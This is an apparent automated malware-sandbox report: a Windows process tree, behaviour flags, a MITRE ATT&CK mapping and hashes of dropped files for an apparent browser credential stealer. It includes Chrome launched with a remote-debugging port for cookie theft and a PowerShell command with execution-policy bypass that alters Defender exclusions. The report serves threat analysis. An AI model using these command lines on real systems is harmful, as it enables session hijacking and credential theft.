- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff502adcf8,0x7fff502add04,0x7fff502add105⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1956 /prefetch:25⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1452,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2248 /prefetch:115⤵PID:3116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2520 /prefetch:135⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3336 /prefetch:15⤵
- Uses browser remote debugging
PID:2316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3392 /prefetch:15⤵
- Uses browser remote debugging
PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4236 /prefetch:95⤵
- Uses browser remote debugging
PID:6112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3380,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4672 /prefetch:15⤵
- Uses browser remote debugging
PID:4812
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1588
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6008
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6040
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Windows Management Instrumentation
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Ignore Process Interrupts
1Indicator Removal
3File Deletion
3Modify Authentication Process
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
40B
MD51d6d1e773c2cb63516dc875f48b6b40c
SHA180bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA2562e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize87B
MD5e4a639b9d8bf7a90cc97bb4e05a36753
SHA1676facdabf06e5f014e95218bfc02b8c18c39284
SHA25679da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA5124a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
3KB
MD546239bd975531c9499d4a7b2b74d2a9d
SHA1727bb16f48ad10836ed4498e5b5f06383a11b56b
SHA256c894fd41e011830d9217270cd0f34e1d0d242ddbaee4dd8b7a9bd1d010dfd543
SHA5125a6790fadc439e32a026f3c1493939fe8ebc2405228a9b7ce44f130e2c555ad16e7c4c1f8ab3db515e1855b5f9c61b42b463ebd34bc23fed667f7372ffc44a9c
-
Filesize
289B
MD5541c42f1c98b3e1b011d22eba854e707
SHA1db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA2560768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA51247828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604
-
Filesize
17KB
MD54786cf24e3e07c212272a4c2c0aa6aad
SHA16948ce944e1dde09aafee35b61b7fee15537a785
SHA25601637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc
SHA5126434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654
-
Filesize
1KB
MD556220f7b661c85b776763c1a0f189326
SHA164e8d4898867dafa9de8b87862808a1ac05a1239
SHA2566371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872
SHA5123071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db
-
Filesize
80KB
MD5cc50af13ee0c561d894eed8b17edfad3
SHA1aa1747bbb687a0db699398fb5d3172ad9dd10743
SHA256c54b3da8b2aa67cafd041342fcde020981d6bd8815cc77922a8ef4c8beb2ac33
SHA512e2ff0790446ef2699fa1760b204a17ff5ee35086c4e344edf21aaad9f902b9e58932c99044fe73d7838f1e62db4d950dc887db043a6360cd3d7619663718f4fe
-
Filesize
226B
MD54ae344179932dc8e2c6fe2079f9753ef
SHA160eacc624412b1f34809780769e3b212f138ea9c
SHA2563063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
1KB
MD5765bc526389d1c3c6b24939610edf073
SHA1a90843728a41cac4d1cb27db24cfe3e1d1883770
SHA256c7a6dd86804fa75544c220669c4e44db094b48cc615b4eeada0fdf887450aea9
SHA512d4ae996bc26e285d23f256a947e6ccf17de49b70d4a078a4f349a2a1a5625f4e2bd7f2efd548a94db72a39e685b6af559e8c671e57b5d7feb4bd0d0484c82085
-
Filesize
1KB
MD5d057703d5a9ab9259469130b501e63f4
SHA14ab7ee5f3fc41ddd9a0df6e2833dee335825db5d
SHA256a59409f996c24a5093a52a1a9deafaf674dade18bae41a6c2ef4b615870a71a9
SHA512032a463d998befa5dcd7faaf18521685a481a52bb7d79ea1a046ef0e250875f95898fcf6a1ed58e3c41ba8830d50f8da33f8e57892892b328934c056449e944a
-
Filesize
406KB
MD53735edaa1493149cd9fd006f073ec41b
SHA1d32f88528b618edc291e82da40af49eb4272aafc
SHA256e01e422bced67444752377f08dd9e214dc08f733ecfabae219a12c4f831699e7
SHA5124eecdd4d350324725a6c9ffbd470c24ac9cb9a364db105b3165746bc33057d7166ce036db0126222b34da73c7fa80bc426e203a5c387a167fa20e41ebf6674f7
-
Filesize
81B
MD5ea511fc534efd031f852fcf490b76104
SHA1573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
-
Filesize
407KB
MD5e0adf0867e8554540a148a8c8f32531a
SHA13b7be665430a3fbf0188ab4266f969bcda4b5f75
SHA25674c1586a8ceb214c5fd7900963ac8161c204f53e6796bec0ef277edc0299fab6
SHA5124ae50aafadedfcde66fd7ae2870be72abfbc84731b25dfe2fb0821fd43c619f8026d0b83909ee2bbca1bd6c7b395fbc5c7394c5bd62ced928019a4eef81fb5d3
-
Filesize
354B
MD56aefe93fdfd9eb14b8cce9dc57cd4a01
SHA14c02dccf4f95a806c1dbb3b52adcfc12e43ee6cf
SHA256ed4dd5866fb162b785c728695026db166d0172aac6be52224bd96c7cd6b9cc0f
SHA512d693e21225879d36bcd09b5a885c9f145771fd0f6d01713e67afb3aa376a9ece2aa856d721104c777a63b257c17410e1810879bc4b21e55e00c305df18f841ac
-
Filesize
4KB
MD51ae41b785ff43616d6884b29feb2fded
SHA13b9097d8668185e70992d6d6b8bae269366d6573
SHA256f7a74b1130983dc5d5dad2f8f2960165f4ec9d82dadf2e914d1d30bd958c5477
SHA512005b15ae9ceefb9e383d56ea372781a8183e2ea49bcf1ac088b0087cacc5d7f096c33b11f91cf0440a05e658c5c7a80e9a543addad719c8196b05ac67e019c1c
-
Filesize
5KB
MD5b581b6dcea702e0259e77d32ccfc4b45
SHA1a9f71d34d6ed1568db1e792823128ff3631d22c2
SHA2565e974eb1087612334bd17e8ae543406ac5f03d7fc9a1f9bc4bf24793b87cb994
SHA5124a4a32ecc3d03709ed123bba716db26698f9f6fe518a330494b8765e3c2629753c5ecef7c269dac0045444e6fe6b14f4761b230d25ef41c44e9c6d9dc98ded77
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
Filesize
2KB
MD5a3ad1912a8da0ccb4995ad05b6794663
SHA1b130888a375301a74adf672dd4a2067fedd4895c
SHA256c1044a49f991beea34b34fb75d3274d49ac1333170744e3371caf69b4bf7f38a
SHA51220a9e6cefff544cc2e63931c11aab561b58e34505d97d57c4de295be8cc17f91f7cb63b2e0569948682407ef27011362898d361ea78160bfc772c385330d7df7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD57605fb5c749eeea0b1b27fdaad78051c
SHA128388bf016af085bbcbacf8c516853942f6ec8d3
SHA256466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA5121a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
-
Filesize
211KB
MD5b6054dbe4ed853c2e35291f045a632ba
SHA11355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0
-
Filesize
780B
MD560d646f40556d78166ad8111d850fc51
SHA1babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA5123fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6